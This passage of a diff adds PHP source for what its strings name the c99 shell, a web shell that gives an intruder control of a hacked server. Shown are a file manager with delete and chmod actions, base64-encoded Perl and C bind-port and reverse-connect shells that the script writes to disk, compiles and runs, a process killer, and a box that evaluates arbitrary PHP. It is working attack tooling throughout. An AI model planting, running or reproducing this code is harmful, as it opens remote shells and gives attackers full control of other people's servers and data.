+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     $ow = @posix_getpwuid(fileowner($v));
+     $gr = @posix_getgrgid(filegroup($v));
+     $row[] = $ow["name"]."/".$gr["name"];
+     $row[] = fileowner($v)."/".filegroup($v);
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["dirs"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+   }
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   $k = $sort[0];
+   if (!is_numeric($k)) {$k = $sort[0] = 0;}
+   if ($sort[1] != "a") {$sort[1] = "d";}
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($sort[1] == "a"?"d":"a")."\">";
+   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($sort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$sort[1]."\">".$row[$i]."</a>";}
+   }
+   $v = $sort[0];
+   usort($objects["dirs"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($sort[1] == "d")
+   {
+    $objects["dirs"] = array_reverse($objects[dirs]);
+    $objects["files"] = array_reverse($objects[files]);
+   }
+   $objects = array_merge($objects["head"],$objects["dirs"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["dirs"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command"; exit;}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+      }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" id=\"ls_dir[]\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";}
+    if (($o == ".") or ($o == "..")) {$tab[head][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["dirs"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+   }
+  }
+  //Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["dirs"],$tab["links"],$tab["files"]);
+  echo "<center><b>Listing directory (".count($tab["files"])." files and ".(count($tab["dirs"])+count($tab["links"]))." directories):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0><form method=\"POST\">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\"><b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=\"act\"><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">Delete</option>";
+  echo "<option value=\"chmod\"".gchds($dspact,"chmod"," selected").">Change-mode</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">Cut</option>";
+   echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">Copy</option>";
+   echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+if ($act == "bind")
+{
+ $bndsrcs = array(
+"c99sh_bindport.pl"=>
+"IyEvdXNyL2Jpbi9wZXJsDQppZiAoQEFSR1YgPCAxKSB7ZXhpdCgxKTt9DQokcG9ydCA9ICRBUkdW".
+"WzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NI".
+"TER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RS".
+"RUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJp".
+"bmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQph".
+"Y2NlcHQoWCxTKTsNCm9wZW4gU1RESU4sICI8JlgiOw0Kb3BlbiBTVERPVVQsICI+JlgiOw0Kb3Bl".
+"biBTVERFUlIsICI+JlgiOw0KZXhlYygiZWNobyBcIldlbGNvbWUgdG8gYzk5c2hlbGwhXHJcblxy".
+"XG5cIiIpOw0Kd2hpbGUoMSkNCnsNCiBhY2NlcHQoWCwgUyk7DQogdW5sZXNzKGZvcmspDQogew0K".
+"ICBvcGVuIFNURElOLCAiPCZYIjsNCiAgb3BlbiBTVERPVVQsICI+JlgiOw0KICBjbG9zZSBYOw0K".
+"ICBleGVjKCIvYmluL3NoIik7DQogfQ0KIGNsb3NlIFg7DQp9",
+"c99sh_bindport.c"=>
+"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5".
+"cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N".
+"CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy".
+"ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1".
+"Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f".
+"ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p".
+"KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm".
+"ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi".
+"c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl".
+"LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h".
+"Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN".
+"CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy".
+"ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp".
+"DQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byBjOTlzaGVsbCAmJiAvYmluL2Jhc2ggLWkiKTsN".
+"CiAgIGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJTb3JyeSIpOw0KICAgY2xvc2UobmV3ZmQpOw0K".
+"ICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQg".
+"aTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0g".
+"J1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVy".
+"ZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0K".
+"fQ==",
+"c99sh_backconn.pl"=>
+"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ".
+"HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ".
+"DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ".
+"HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L".
+"CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd".
+"GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka".
+"WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO".
+"iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR".
+"VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK".
+"FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==",
+"c99sh_backconn.c"=>
+"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5l".
+"dGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZk".
+"Ow0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBk".
+"YWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0g".
+"aHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihh".
+"cmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsy".
+"XSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsg".
+"DQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1".
+"Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0".
+"KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIo".
+"ZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwi".
+"c2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="
+);
+ $bndportsrcs = array(
+"c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
+"c99sh_bindport.c"=>array("Using C","%path %port %pass")
+);
+ $bcsrcs = array(
+"c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
+"c99sh_backconn.c"=>array("Using C","%path %host %port")
+);
+ if ($win) {echo "<b>Binding port and Back connect:</b><br>This functions not work in Windows!<br><br>";}
+ else
+ {
+  if (!is_array($bind)) {$bind = array();}
+  if (!is_array($bc)) {$bc = array();}
+  if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
+  if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
+  if (empty($bc["host"])) {$bc["host"] = $REMOTE_ADDR;}
+  if (!is_numeric($bc["port"])) {$bc["port"] = $bindport_port;}
+  if (!empty($bindsubmit))
+  {
+   echo "<b>Result of binding port:</b><br>";
+   $v = $bndportsrcs[$bind["src"]];
+   if (empty($v)) {echo "Unknown file!<br>";}
+   elseif (fsockopen($SERVER_ADDR,$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+   else
+   {
+    $srcpath = $tmpdir.$bind["src"];
+    $w = explode(".",$bind["src"]);
+    $ext = $w[count($w)-1];
+    unset($w[count($w)-1]);
+    $binpath = $tmpdir.join(".",$w);
+    if ($ext == "pl") {$binpath = $srcpath;}
+    @unlink($srcpath);
+    $fp = fopen($srcpath,"ab+");
+    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+    else
+    {
+     $data = base64_decode($bndsrcs[$bind["src"]]);
+     fwrite($fp,$data,strlen($data));
+     fclose($fp);
+     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
+     $v[1] = str_replace("%path",$binpath,$v[1]);
+     $v[1] = str_replace("%port",$bind["port"],$v[1]);
+     $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
+     $v[1] = str_replace("//","/",$v[1]);
+     $retbind = myshellexec($v[1]." > /dev/null &");
+     sleep(5);
+     $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
+     if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
+     else {echo "Binding... ok! Connect to <b>".$SERVER_ADDR.":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".$SERVER_ADDR." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=ps_aux&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
+    }
+    echo "<br>";
+   }
+  }
+  if (!empty($bcsubmit))
+  {
+   echo "<b>Result of back connection:</b><br>";
+   $v = $bcsrcs[$bc["src"]];
+   if (empty($v)) {echo "Unknown file!<br>";}
+   else
+   {
+    $srcpath = $tmpdir.$bc["src"];
+    $w = explode(".",$bc["src"]);
+    $ext = $w[count($w)-1];
+    unset($w[count($w)-1]);
+    $binpath = $tmpdir.join(".",$w);
+    if ($ext == "pl") {$binpath = $srcpath;}
+    @unlink($srcpath);
+    $fp = fopen($srcpath,"ab+");
+    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+    else
+    {
+     $data = base64_decode($bndsrcs[$bind[src]]);
+     fwrite($fp,$data,strlen($data));
+     fclose($fp);
+     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+     $v[1] = str_replace("%path",$binpath,$v[1]);
+     $v[1] = str_replace("%host",$bc["host"],$v[1]);
+     $v[1] = str_replace("%port",$bc["port"],$v[1]);
+     $v[1] = str_replace("//","/",$v[1]);
+     $retbind = myshellexec($v[1]." > /dev/null &");
+     echo "Now script try connect to ".$bc["host"].":".$bc["port"]."...<br>";
+    }
+   }
+  }
+  ?><b>Binding port:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<?php echo $d; ?>">Port: <input type="text" name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type="text" name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
+foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type="submit" name="bindsubmit" value="Bind"></form>
+<b>Back connection:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<?php echo $d; ?>">HOST: <input type="text" name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type="text" name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
+foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type="submit" name="bcsubmit" value="Connect"></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p &lt;port&gt;</b>"!<?php
+ }
+}
+if ($act == "ps_aux")
+{
+ echo "<b>Processes:</b><br>";
+ if ($win) {echo "This function not work in Windows!<br><br>";}
+ else
+ {
+  if ($pid)
+  {
+   if (!$sig) {$sig = 9;}
+   echo "Sending signal ".$sig." to #".$pid."... ";
+   $ret = posix_kill($pid,$sig);
+   if ($ret) {echo "ok. he is dead, amen.";}
+   else {echo "ERROR.";}
+  }
+  $ret = myshellexec("ps -aux");
+  if (!$ret) {echo "Can't execute \"ps -aux\"!";}
+  else
+  {
+   $ret = htmlspecialchars($ret);
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;}
+   if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;}
+   $k = $ps_aux_sort[0];
+   if ($ps_aux_sort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&ps_aux_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&ps_aux_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&ps_aux_sort=".$i.$ps_aux_sort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+	{
+	 echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10,count($line)));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=\"green\">".$line[0]."</font>";}
+     $line[] = "<a href=\"".$surl."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+   $head[$k] = "<b>".$head[$k]."</b>".$y;
+   $head[] = "<b>ACTION</b>";
+   $v = $ps_aux_sort[0];
+   usort($prcs,"tabsort");
+   if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);}
+   $tab = array();
+   $tab[] = $head;
+   $tab = array_merge($tab,$prcs);
+   echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+   foreach($tab as $k)
+   {
+    echo "<tr>";
+    foreach($k as $v) {echo "<td>".$v."</td>";}
+    echo "</tr>";
+   }
+   echo "</table>";
+  }
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
+ echo "<form method=\"POST\"><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+   array("Code","code"),
+   array("Session","phpsess"),
+   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+   array("SDB","sdb"),
+   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+  );
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=\"green\">".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";      
+    $tmp = posix_getpwuid(fileowner($d.$f));
+    if ($tmp["name"] == "") {echo fileowner($d.$f)."/";}
+    else {echo $tmp["name"]."/";}
+    $tmp = posix_getgrgid(filegroup($d.$f));
+    if ($tmp["name"] == "") {echo filegroup($d.$f);}
+    else {echo $tmp['name'];}
+   }
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
